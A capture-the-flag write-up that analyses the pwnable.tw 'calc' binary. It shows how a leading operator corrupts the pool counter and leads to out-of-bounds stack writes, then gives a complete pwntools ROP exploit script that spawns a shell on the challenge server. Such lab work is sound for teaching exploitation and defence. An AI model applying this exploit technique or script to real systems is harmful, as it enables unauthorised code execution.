1. Binary overview + protections

First, I checked the binary protections. PIE is disabled, so function addresses, global variables, and ROP gadgets are stable across runs.

alt text

A quick run shows that the program reads an arithmetic expression and prints the calculated result.

alt text

Opening the binary in IDA, main is the entry point. It sets an alarm that fires after 60 seconds. When the alarm triggers, the timeout function prints No time to waste! and exits. Otherwise, main prints the welcome message, calls calc, then prints Merry Christmas! before exiting.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  _bsd_signal(14, timeout);
  alarm();
  IO_puts("=== Welcome to SECPROG calculator ===");
  IO_fflush(stdout);
  calc();
  return IO_puts("Merry Christmas!");
}

The calc function repeatedly reads expressions, initializes a stack-based pool, parses the expression, and prints the final result.

unsigned int calc()
{
  pool pool; // [esp+18h] [ebp-5A0h] BYREF
  char expr[1024]; // [esp+1ACh] [ebp-40Ch] BYREF
  unsigned int v3; // [esp+5ACh] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  while ( 1 )
  {
    __bzero(expr, 0x400u);
    if ( !get_expr(expr, 1024) )
      break;
    init_pool(&pool);
    if ( parse_expr(expr, &pool) )
    {
      _printf("%d\n", pool.nums[pool.cnt - 1]);
      IO_fflush(stdout);
    }
  }
  return __readgsdword(0x14u) ^ v3;
}

get_expr reads user input into a 1024-byte buffer. It only accepts digits and the arithmetic operators +, -, *, /, and %. Since the input length is bounded, this function does not provide a direct buffer overflow.

int __cdecl get_expr(char *a1, int a2)
{
  int index; // eax
  char curr_char; // [esp+1Bh] [ebp-Dh] BYREF
  int curr_len; // [esp+1Ch] [ebp-Ch]

  curr_len = 0;
  while ( curr_len < a2 && _libc_read(0, &curr_char, 1) != -1 && curr_char != 10 )
  {
    if ( curr_char == '+'
      || curr_char == '-'
      || curr_char == '*'
      || curr_char == '/'
      || curr_char == '%'
      || curr_char > '/' && curr_char <= '9' )
    {
      index = curr_len++;
      a1[index] = curr_char;
    }
  }
  a1[curr_len] = 0;
  return curr_len;
}

The pool structure contains a counter and an array of 100 integers.

00000000 struct pool // sizeof=0x194
00000000 {                                       // XREF: calc/r
00000000     int cnt;                            // XREF: calc+7D/r
00000004     int nums[100];                      // XREF: calc+86/r
00000194 };

2. Vulnerability

The most interesting function is parse_expr. It parses the input expression, stores numbers in pool->nums, stores operators in a separate ops array, and calls eval when an operation should be evaluated.

int __cdecl parse_expr(char *expr, pool *pool)
{
  int nums_idx; // eax
  char *next; // [esp+20h] [ebp-88h]
  int i; // [esp+24h] [ebp-84h]
  int ops_idx; // [esp+28h] [ebp-80h]
  char *token_len; // [esp+2Ch] [ebp-7Ch]
  char *token; // [esp+30h] [ebp-78h]
  int num; // [esp+34h] [ebp-74h]
  char ops[100]; // [esp+38h] [ebp-70h] BYREF
  unsigned int v11; // [esp+9Ch] [ebp-Ch]

  v11 = __readgsdword(0x14u);
  next = expr;
  ops_idx = 0;
  __bzero(ops, 0x64u);
  for ( i = 0; ; ++i )
  {
    if ( expr[i] - (unsigned int)'0' > 9 )      // is operation
    {
      token_len = (char *)(&expr[i] - next);
      token = (char *)malloc((int)(token_len + 1));
      memcpy(token, next, token_len);
      token[(_DWORD)token_len] = 0;
      if ( !strcmp(token, "0") )
      {
        IO_puts((int)"prevent division by zero");
        IO_fflush(stdout);
        return 0;
      }
      num = atoi(token);
      if ( num > 0 )
      {
        nums_idx = pool->cnt++;
        pool->nums[nums_idx] = num;
      }
      if ( expr[i] && expr[i + 1] - (unsigned int)'0' > 9 )// is operation
      {
        IO_puts((int)"expression error!");
        IO_fflush(stdout);
        return 0;
      }
      next = &expr[i + 1];
      if ( ops[ops_idx] )
      {
        switch ( expr[i] )
        {
          case '%':
          case '*':
          case '/':
            if ( ops[ops_idx] != '+' && ops[ops_idx] != '-' )
              goto LABEL_14;
            ops[++ops_idx] = expr[i];
            break;
          case '+':
          case '-':
LABEL_14:
            eval(pool, ops[ops_idx]);
            ops[ops_idx] = expr[i];
            break;
          default:
            eval(pool, ops[ops_idx--]);
            break;
        }
      }
      else
      {
        ops[ops_idx] = expr[i];
      }
      if ( !expr[i] )
        break;
    }
  }
  while ( ops_idx >= 0 )
    eval(pool, ops[ops_idx--]);
  return 1;
}

eval takes the last two numbers in the pool, applies the operator, stores the result in the second-to-last slot, and decrements pool->cnt.

_DWORD *__cdecl eval(pool *pool, char op)
{
  if ( op == '+' )
  {
    pool->nums[pool->cnt - 2] += pool->nums[pool->cnt - 1];
  }
  else if ( op > '+' )
  {
    if ( op == '-' )
    {
      pool->nums[pool->cnt - 2] -= pool->nums[pool->cnt - 1];
    }
    else if ( op == '/' )
    {
      pool->nums[pool->cnt - 2] /= pool->nums[pool->cnt - 1];
    }
  }
  else if ( op == '*' )
  {
    pool->nums[pool->cnt - 2] *= pool->nums[pool->cnt - 1];
  }
  --pool->cnt;
  return &pool->cnt;
}

At first, I did not see a clear exploit path. However, several issues stood out:

The input accepts %, but eval only handles +, -, *, and /.
The zero check blocks only the exact string "0", not values such as "00" or "000", which still evaluate to zero.
eval does not check whether pool->cnt is large enough before using pool->nums[pool->cnt - 2] and pool->nums[pool->cnt - 1].
There may be parser edge cases that break the expected number-operator-number pattern.

For a normal expression such as 1+2*3, the parser behaves as expected:

1 is parsed and stored in the pool, so cnt = 1.
+ is stored in ops[0].
2 is parsed and stored in the pool, so cnt = 2.
* has higher precedence than +, so it is stored in ops[1].
3 is parsed and stored in the pool, so cnt = 3.
At the end of the input, 2*3 is evaluated first, leaving [1, 6].
Then 1+6 is evaluated, leaving [7].

The bug appears when the expression starts with an operator.

alt text

For example, take the malformed expression +10+1.

When the parser sees the first +, next still points to the beginning of the string. That means the token length is zero, so the parsed token is an empty string. atoi("") returns 0, and because num > 0 is false, nothing is inserted into the pool. At this point:

pool.cnt = 0
pool.nums = [0, 0, 0, ..., 0]
ops[0] = '+'
ops_idx = 0

Next, 10 is parsed and inserted:

nums_idx = pool->cnt++;
pool->nums[nums_idx] = num;

Now the state is:

pool.cnt = 1
pool.nums = [10, 0, 0, ..., 0]

When the next + is parsed, eval(pool, ops[ops_idx]) is called. Since pool->cnt is only 1, this expression writes out of bounds:

pool->nums[pool->cnt - 2] += pool->nums[pool->cnt - 1];

That becomes:

pool->nums[-1] += pool->nums[0]

Because pool->nums[-1] overlaps pool->cnt, adding 10 changes pool->cnt from 1 to 11.

alt text

Then eval decrements the counter, leaving pool->cnt = 10.

alt text

The next number is stored at pool->nums[10]. When evaluation happens again, the parser performs:

pool->nums[9] += pool->nums[10]

alt text

The final result is printed from the manipulated pool index.

alt text

This gives us control over pool->cnt, which leads to out-of-bounds reads and writes through pool->nums.

3. Exploitation strategy

The goal is to overwrite the saved return address on the stack and redirect execution into a ROP chain.

Because PIE is disabled, gadget addresses are fixed. Using ROPgadget, I found the following useful gadgets and functions:

0x08049a21 : int 0x80
0x080701d0 : pop edx ; pop ecx ; pop ebx ; ret
0x0805c34b : pop eax ; ret
0x0806e6d0 : __libc_read
0x080ecf64 : writable buffer in .data

The ROP chain first calls read(0, 0x080ecf64, 7) to write /bin/sh into the writable .data address. Then it sets up registers for execve("/bin/sh", 0, 0) and triggers int 0x80.

Conceptually, the chain is:

read(0, data_addr, 7)
pop edx ; pop ecx ; pop ebx ; ret
edx = 0
ecx = 0
ebx = data_addr
pop eax ; ret
eax = 0xb
int 0x80

The offset from the start of pool to the saved return address is 0x5a4 bytes. Since pool->nums is an integer array, the target index is:

idx = 0x5a4 // 4

The pool is reset for each expression, but the overwritten stack values remain outside the pool. That means the ROP chain can be written over multiple expressions instead of all at once.

One limitation is that the parser only writes a value into pool->nums when num > 0, so it cannot directly write zero. To create zero values on the stack, I first write a non-zero value and then use subtraction to reduce it back to zero.

For non-zero values, I write the chain from higher indexes to lower indexes so that each expression does not accidentally overwrite a value that was just written.

4. Full exploit script

from pwn import *

r = remote('chall.pwnable.tw', 10100)

off_pool_ret_address = 0x5A4
idx = off_pool_ret_address // 4

r.recvuntil(b'=== Welcome to SECPROG calculator ===\n')

def send(l):
    print(l)
    r.sendline(l.encode())

st = [
    0x08049A21,
    0x080ECF64,
    0x00000000,
    0x00000000,
    0x080701D0,
    0x0000000B,
    0x0805C34B,
    0x00000007,
    0x080ECF64,
    0x00000000,
    0x080701D0,
    0x0806E6D0
]

send(f'+{idx+10}+{0x08049A21}')
send(f'+{idx+9}+{0x080ECF64}')
send(f'+{idx+8}+{0x080ECF64}')
send(f'+{idx+7}+{0x080ECF64}')
send(f'+{idx+6}+{0x080701D0}')
send(f'+{idx+5}+{0x0000000B}')
send(f'+{idx+4}+{0x0805C34B}')
send(f'+{idx+3}+{0x00000007}')
send(f'+{idx+2}+{0x080ECF64}')
send(f'+{idx+1}+{0x080ECF64}')
send(f'+{idx+0}+{0x080701D0}')
send(f'+{idx-1}+{0x0806E6D0}')

send(f'+{idx+8}-{0x080ECF64}')
send(f'+{idx+9}-{0x080ECF64}')
send(f'+{idx+2}-{0x080ECF64}')

r.send(b'\n')

r.interactive()

After sending the payload, the process returns into __libc_read. I enter /bin/sh, and the rest of the ROP chain executes execve.

alt text

5. Lessons learned

Input length checks do not prevent memory corruption if later logic can create out-of-bounds indexes.
Parser edge cases are especially dangerous when the parser assumes a strict grammar but does not enforce that grammar before evaluation.
Arithmetic on stack-based arrays can become an arbitrary write primitive when the index is attacker-controlled.